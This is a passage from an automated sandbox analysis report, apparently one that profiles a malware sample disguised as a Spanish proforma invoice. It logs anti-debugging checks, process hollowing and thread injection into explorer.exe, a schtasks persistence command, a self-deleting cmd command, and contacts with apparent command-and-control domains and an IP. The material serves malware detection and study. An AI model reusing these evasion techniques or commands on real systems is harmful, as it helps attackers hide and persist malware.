            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]10_2_0487FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481E730 mov eax, dword ptr fs:[00000030h]10_2_0481E730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8B58 mov eax, dword ptr fs:[00000030h]10_2_048B8B58
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8F6A mov eax, dword ptr fs:[00000030h]10_2_048B8F6A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F8794 mov eax, dword ptr fs:[00000030h]10_2_047F8794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]10_2_047F1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]10_2_047F1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]10_2_04813B7A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]10_2_04813B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040ACF0 LdrLoadDll, 6_2_0040ACF0
            Source: C:\Users\user\Desktop\Factura de proforma.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe Domain query: www.aminobalm.com
            Source: C:\Windows\explorer.exe Domain query: www.palmonlae.space
            Source: C:\Windows\explorer.exe Network Connect: 13.209.99.177 80
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 260000
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3352
            Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 3352
            Source: C:\Users\user\Desktop\Factura de proforma.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Users\user\Desktop\Factura de proforma.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp Binary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.362766747.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
